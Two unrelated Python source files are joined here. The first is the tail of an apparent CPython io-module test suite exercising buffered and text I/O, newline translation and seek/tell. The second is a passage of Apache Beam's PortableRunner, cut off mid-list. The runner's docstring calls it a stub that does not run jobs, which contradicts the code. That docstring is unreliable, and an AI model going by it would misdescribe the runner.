def testReadAndWrite(self):
raw = MockRawIO((b"asdf", b"ghjk"))
rw = io.BufferedRandom(raw, 8, 12)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read()) # This read forces write flush
self.assertEquals(b"dddeee", raw._write_stack[0])
def testSeekAndTell(self):
raw = io.BytesIO(b"asdfghjkl")
rw = io.BufferedRandom(raw)
self.assertEquals(b"as", rw.read(2))
self.assertEquals(2, rw.tell())
rw.seek(0, 0)
self.assertEquals(b"asdf", rw.read(4))
rw.write(b"asdf")
rw.seek(0, 0)
self.assertEquals(b"asdfasdfl", rw.read())
self.assertEquals(9, rw.tell())
rw.seek(-4, 2)
self.assertEquals(5, rw.tell())
rw.seek(2, 1)
self.assertEquals(7, rw.tell())
self.assertEquals(b"fl", rw.read(11))
self.assertRaises(TypeError, rw.seek, 0.0)
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
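# Worked example of the state packing above: after reset() i == o == 1, so
# getstate() returns (b'', 0); with i == 2 and o == 6 it returns
# (buffer, 307), since 2 ^ 1 == 3 and 6 ^ 1 == 7 give 3*100 + 7.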
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == '.':
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def testDecoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEquals(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEquals(d.decode(b'oiabcd'), '')
self.assertEquals(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
def tearDown(self):
test_support.unlink(test_support.TESTFN)
def testLineBuffering(self):
r = io.BytesIO()
b = io.BufferedWriter(r, 1000)
t = io.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write(u"X")
self.assertEquals(r.getvalue(), b"") # No flush happened
t.write(u"Y\nZ")
self.assertEquals(r.getvalue(), b"XY\nZ") # All got flushed
t.write(u"A\rB")
self.assertEquals(r.getvalue(), b"XY\nZA\rB")
def testEncodingErrorsReading(self):
# (1) default
b = io.BytesIO(b"abc\n\xff\n")
t = io.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = io.BytesIO(b"abc\n\xff\n")
t = io.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = io.BytesIO(b"abc\n\xff\n")
t = io.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEquals(t.read(), "abc\n\n")
# (4) replace
b = io.BytesIO(b"abc\n\xff\n")
t = io.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEquals(t.read(), u"abc\n\ufffd\n")
def testEncodingErrorsWriting(self):
# (1) default
b = io.BytesIO()
t = io.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, u"\xff")
# (2) explicit strict
b = io.BytesIO()
t = io.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, u"\xff")
# (3) ignore
b = io.BytesIO()
t = io.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write(u"abc\xffdef\n")
t.flush()
self.assertEquals(b.getvalue(), b"abcdef\n")
# (4) replace
b = io.BytesIO()
t = io.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write(u"abc\xffdef\n")
t.flush()
self.assertEquals(b.getvalue(), b"abc?def\n")
def testNewlinesInput(self):
testdata = b"AAA\nBBB\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(True)),
("", testdata.decode("ascii").splitlines(True)),
("\n", ["AAA\n", "BBB\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBBB\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBBB\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = io.BytesIO(testdata)
txt = io.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEquals(txt.readlines(), expected)
txt.seek(0)
self.assertEquals(txt.read(), "".join(expected))
def testNewlinesOutput(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = io.BytesIO()
txt = io.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEquals(buf.closed, False)
self.assertEquals(buf.getvalue(), expected)
def testNewlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = io.BufferedReader(io.BytesIO(data), bufsize)
textio = io.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEquals(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEquals(got_line, exp_line)
self.assertEquals(len(got_lines), len(exp_lines))
def testNewlinesOutput(self):
data = u"AAA\nBBB\rCCC\n"
data_lf = b"AAA\nBBB\rCCC\n"
data_cr = b"AAA\rBBB\rCCC\r"
data_crlf = b"AAA\r\nBBB\rCCC\r\n"
save_linesep = os.linesep
try:
for os.linesep, newline, expected in [
("\n", None, data_lf),
("\r\n", None, data_crlf),
("\n", "", data_lf),
("\r\n", "", data_lf),
("\n", "\n", data_lf),
("\r\n", "\n", data_lf),
("\n", "\r", data_cr),
("\r\n", "\r", data_cr),
("\n", "\r\n", data_crlf),
("\r\n", "\r\n", data_crlf),
]:
buf = io.BytesIO()
txt = io.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write(data)
txt.close()
self.assertEquals(buf.closed, True)
self.assertRaises(ValueError, buf.getvalue)
finally:
os.linesep = save_linesep
# Systematic tests of the text I/O API
def testBasicIO(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin1", "utf8" :# , "utf-16-be", "utf-16-le":
f = io.open(test_support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEquals(f.write(u"abc"), 3)
f.close()
f = io.open(test_support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEquals(f.tell(), 0)
self.assertEquals(f.read(), u"abc")
cookie = f.tell()
self.assertEquals(f.seek(0), 0)
self.assertEquals(f.read(2), u"ab")
self.assertEquals(f.read(1), u"c")
self.assertEquals(f.read(1), u"")
self.assertEquals(f.read(), u"")
self.assertEquals(f.tell(), cookie)
self.assertEquals(f.seek(0), 0)
self.assertEquals(f.seek(0, 2), cookie)
self.assertEquals(f.write(u"def"), 3)
self.assertEquals(f.seek(cookie), cookie)
self.assertEquals(f.read(), u"def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = u"s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = u"".join(chars) + u"\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEquals(rlines, wlines)
def testTelling(self):
f = io.open(test_support.TESTFN, "w+", encoding="utf8")
p0 = f.tell()
f.write(u"\xff\n")
p1 = f.tell()
f.write(u"\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEquals(f.tell(), p0)
self.assertEquals(f.readline(), u"\xff\n")
self.assertEquals(f.tell(), p1)
self.assertEquals(f.readline(), u"\xff\n")
self.assertEquals(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEquals(line, u"\xff\n")
self.assertRaises(IOError, f.tell)
self.assertEquals(f.tell(), p2)
f.close()
def testSeeking(self):
chunk_size = io.TextIOWrapper._CHUNK_SIZE
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEquals(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
f = io.open(test_support.TESTFN, "wb")
f.write(line*2)
f.close()
f = io.open(test_support.TESTFN, "r", encoding="utf-8")
s = f.read(prefix_size)
self.assertEquals(s, unicode(prefix, "ascii"))
self.assertEquals(f.tell(), prefix_size)
self.assertEquals(f.readline(), u_suffix)
def testSeekingToo(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
f = io.open(test_support.TESTFN, "wb")
f.write(data)
f.close()
f = io.open(test_support.TESTFN, "r", encoding="utf-8")
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def testSeekAndTell(self):
"""Test seek/tell using the StatefulIncrementalDecoder."""
def testSeekAndTellWithData(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = io.open(test_support.TESTFN, 'wb')
f.write(data)
f.close()
f = io.open(test_support.TESTFN, encoding='test_decoder')
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = io.open(test_support.TESTFN, encoding='test_decoder')
self.assertEquals(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEquals(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEquals(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
testSeekAndTellWithData(input)
# Position each test case so that it crosses a chunk boundary.
CHUNK_SIZE = io.TextIOWrapper._CHUNK_SIZE
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
testSeekAndTellWithData(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def testEncodedWrites(self):
data = u"1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = io.BytesIO()
f = io.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEquals(f.read(), data * 2)
self.assertEquals(buf.getvalue(), (data * 2).encode(encoding))
def timingTest(self):
timer = time.time
enc = "utf8"
line = "\0\x0f\xff\u0fff\uffff\U000fffff\U0010ffff"*3 + "\n"
nlines = 10000
nchars = len(line)
nbytes = len(line.encode(enc))
for chunk_size in (32, 64, 128, 256):
f = io.open(test_support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunk_size
t0 = timer()
for i in range(nlines):
f.write(line)
f.flush()
t1 = timer()
f.seek(0)
for line in f:
pass
t2 = timer()
f.seek(0)
while f.readline():
pass
t3 = timer()
f.seek(0)
while f.readline():
f.tell()
t4 = timer()
f.close()
if test_support.verbose:
print("\nTiming test: %d lines of %d characters (%d bytes)" %
(nlines, nchars, nbytes))
print("File chunk size: %6s" % f._CHUNK_SIZE)
print("Writing: %6.3f seconds" % (t1-t0))
print("Reading using iteration: %6.3f seconds" % (t2-t1))
print("Reading using readline(): %6.3f seconds" % (t3-t2))
print("Using readline()+tell(): %6.3f seconds" % (t4-t3))
def testReadOneByOne(self):
txt = io.TextIOWrapper(io.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEquals(reads, "AA\nBB")
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def testReadByChunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = io.TextIOWrapper(io.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEquals(reads, "A"*127+"\nB")
def test_issue1395_1(self):
txt = io.TextIOWrapper(io.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEquals(reads, self.normalized)
def test_issue1395_2(self):
txt = io.TextIOWrapper(io.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEquals(reads, self.normalized)
def test_issue1395_3(self):
txt = io.TextIOWrapper(io.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEquals(reads, self.normalized)
def test_issue1395_4(self):
txt = io.TextIOWrapper(io.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEquals(reads, self.normalized)
def test_issue1395_5(self):
txt = io.TextIOWrapper(io.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEquals(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = io.BytesIO(self.testdata)
txt = io.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def check_newline_decoder_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEquals(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEquals(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoder(self, decoder, encoding):
result = []
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
for b in encoder.encode(s):
result.append(decoder.decode(b))
self.assertEquals(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEquals(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEquals(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEquals(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEquals(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEquals("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
self.assertEquals(decoder.decode("abc".encode(encoding)), "abc")
self.assertEquals(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = codecs.getincrementaldecoder(enc)()
decoder = io.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoder(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = io.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoder_utf8(decoder)
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
test_support.unlink(test_support.TESTFN)
def testImport__all__(self):
for name in io.__all__:
obj = getattr(io, name, None)
self.assert_(obj is not None, name)
if name == "open":
continue
elif "error" in name.lower():
self.assert_(issubclass(obj, Exception), name)
else:
self.assert_(issubclass(obj, io.IOBase))
def test_attributes(self):
f = io.open(test_support.TESTFN, "wb", buffering=0)
self.assertEquals(f.mode, "wb")
f.close()
f = io.open(test_support.TESTFN, "U")
self.assertEquals(f.name, test_support.TESTFN)
self.assertEquals(f.buffer.name, test_support.TESTFN)
self.assertEquals(f.buffer.raw.name, test_support.TESTFN)
self.assertEquals(f.mode, "U")
self.assertEquals(f.buffer.mode, "rb")
self.assertEquals(f.buffer.raw.mode, "rb")
f.close()
f = io.open(test_support.TESTFN, "w+")
self.assertEquals(f.mode, "w+")
self.assertEquals(f.buffer.mode, "rb+") # Does it really matter?
self.assertEquals(f.buffer.raw.mode, "rb+")
g = io.open(f.fileno(), "wb", closefd=False)
self.assertEquals(g.mode, "wb")
self.assertEquals(g.raw.mode, "wb")
self.assertEquals(g.name, f.fileno())
self.assertEquals(g.raw.name, f.fileno())
f.close()
g.close()
def test_main():
test_support.run_unittest(IOTest, BytesIOTest, StringIOTest,
BufferedReaderTest, BufferedWriterTest,
BufferedRWPairTest, BufferedRandomTest,
StatefulIncrementalDecoderTest,
TextIOWrapperTest, MiscIOTest)
if __name__ == "__main__":
unittest.main()
|
portable_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import functools
import itertools
import json
import logging
import os
import threading
import time
from concurrent import futures
import grpc
from apache_beam import metrics
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.portability.api import beam_job_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import fn_api_runner_transforms
from apache_beam.runners.portability import local_job_service
from apache_beam.runners.portability import portable_stager
from apache_beam.runners.portability.job_server import DockerizedJobServer
from apache_beam.runners.worker import sdk_worker
from apache_beam.runners.worker import sdk_worker_main
__all__ = ['PortableRunner']
MESSAGE_LOG_LEVELS = {
beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.STOPPED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
@staticmethod
def default_docker_image():
if 'USER' in os.environ:
# Perhaps also test if this was built?
logging.info('Using latest locally built Python SDK docker image.')
return os.environ['USER'] + '-docker-apache.bintray.io/beam/python:latest'
else:
logging.warning('Could not find a Python SDK docker image.')
return 'unknown'
@staticmethod
def _create_environment(options):
portable_options = options.view_as(PortableOptions)
environment_urn = common_urns.environments.DOCKER.urn
if portable_options.environment_type == 'DOCKER':
environment_urn = common_urns.environments.DOCKER.urn
elif portable_options.environment_type == 'PROCESS':
environment_urn = common_urns.environments.PROCESS.urn
elif portable_options.environment_type in ('EXTERNAL', 'LOOPBACK'):
environment_urn = common_urns.environments.EXTERNAL.urn
elif portable_options.environment_type:
if portable_options.environment_type.startswith('beam:env:'):
environment_urn = portable_options.environment_type
else:
raise ValueError(
'Unknown environment type: %s' % portable_options.environment_type)
if environment_urn == common_urns.environments.DOCKER.urn:
docker_image = (
portable_options.environment_config
or PortableRunner.default_docker_image())
return beam_runner_api_pb2.Environment(
url=docker_image,
urn=common_urns.environments.DOCKER.urn,
payload=beam_runner_api_pb2.DockerPayload(
container_image=docker_image
).SerializeToString())
elif environment_urn == common_urns.environments.PROCESS.urn:
config = json.loads(portable_options.environment_config)
return beam_runner_api_pb2.Environment(
urn=common_urns.environments.PROCESS.urn,
payload=beam_runner_api_pb2.ProcessPayload(
os=(config.get('os') or ''),
arch=(config.get('arch') or ''),
command=config.get('command'),
env=(config.get('env') or '')
).SerializeToString())
elif environment_urn == common_urns.environments.EXTERNAL.urn:
return beam_runner_api_pb2.Environment(
urn=common_urns.environments.EXTERNAL.urn,
payload=beam_runner_api_pb2.ExternalPayload(
endpoint=endpoints_pb2.ApiServiceDescriptor(
url=portable_options.environment_config)
).SerializeToString())
else:
return beam_runner_api_pb2.Environment(
urn=environment_urn,
payload=(portable_options.environment_config.encode('ascii')
if portable_options.environment_config else None))
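# For reference (values purely illustrative): the PROCESS branch above
# expects environment_config to be a JSON object with the keys read by
# config.get(), for example:
#
#   '{"os": "linux", "arch": "amd64", "command": "/path/to/boot", "env": {"FOO": "bar"}}'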
def run_pipeline(self, pipeline, options):
portable_options = options.view_as(PortableOptions)
job_endpoint = portable_options.job_endpoint
# TODO: https://issues.apache.org/jira/browse/BEAM-5525
# portable runner specific default
if options.view_as(SetupOptions).sdk_location == 'default':
options.view_as(SetupOptions).sdk_location = 'container'
if not job_endpoint:
# TODO Provide a way to specify a container Docker URL
# https://issues.apache.org/jira/browse/BEAM-6328
docker = DockerizedJobServer()
job_endpoint = docker.start()
job_service = None
elif job_endpoint == 'embed':
job_service = local_job_service.LocalJobServicer()
else:
job_service = None
# When LOOPBACK mode is requested, start an in-process worker pool server,
# since no external worker endpoint has been provided.
if portable_options.environment_type == 'LOOPBACK':
portable_options.environment_config, server = (
BeamFnExternalWorkerPoolServicer.start(
sdk_worker_main._get_worker_count(options)))
# Presumably stored at module level so the worker server stays referenced
# for the life of the process; the original intent is not documented here.
globals()['x'] = server
cleanup_callbacks = [functools.partial(server.stop, 1)]
else:
cleanup_callbacks = []
proto_pipeline = pipeline.to_runner_api(
default_environment=PortableRunner._create_environment(
portable_options))
# Some runners won't detect the GroupByKey transform unless it has no
# subtransforms. Remove all sub-transforms until BEAM-4605 is resolved.
for _, transform_proto in list(
proto_pipeline.components.transforms.items()):
if transform_proto.spec.urn == common_urns.primitives.GROUP_BY_KEY.urn:
for sub_transform in transform_proto.subtransforms:
del proto_pipeline.components.transforms[sub_transform]
del transform_proto.subtransforms[:]
# Preemptively apply combiner lifting, until all runners support it.
# This optimization is idempotent.
pre_optimize = options.view_as(DebugOptions).lookup_experiment(
'pre_optimize', 'combine').lower()
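# Illustrative note: experiments such as this are usually passed on the
# command line, e.g. --experiments=pre_optimize=all (flag name assumed;
# the value is looked up via DebugOptions.lookup_experiment above).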
if not options.view_as(StandardOptions).streaming:
flink_known_urns = frozenset([
common_urns.composites.RESHUFFLE.urn,
common_urns.primitives.IMPULSE.urn,
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn])
if pre_optimize == 'combine':
proto_pipeline = fn_api_runner_transforms.optimize_pipeline(
proto_pipeline,
phases=[fn_api_runner_transforms.lift_combiners],
known_runner_urns=flink_known_urns,
partial=True)
elif pre_optimize == 'all':
proto_pipeline = fn_api_runner_transforms.optimize_pipeline(
proto_pipeline,
phases=[fn_api_runner_transforms.annotate_downstream_side_inputs,
fn_api_runner_transforms.annotate_stateful_dofns_as_roots,
fn_api_runner_transforms.fix_side_input_pcoll_coders,
fn_api_runner_transforms.lift_combiners,
fn_api_runner_transforms.fix_flatten_coders,
# fn_api_runner_transforms.sink_flattens,
fn_api_runner_transforms.greedily_fuse,
fn_api_runner_transforms.read_to_impulse,
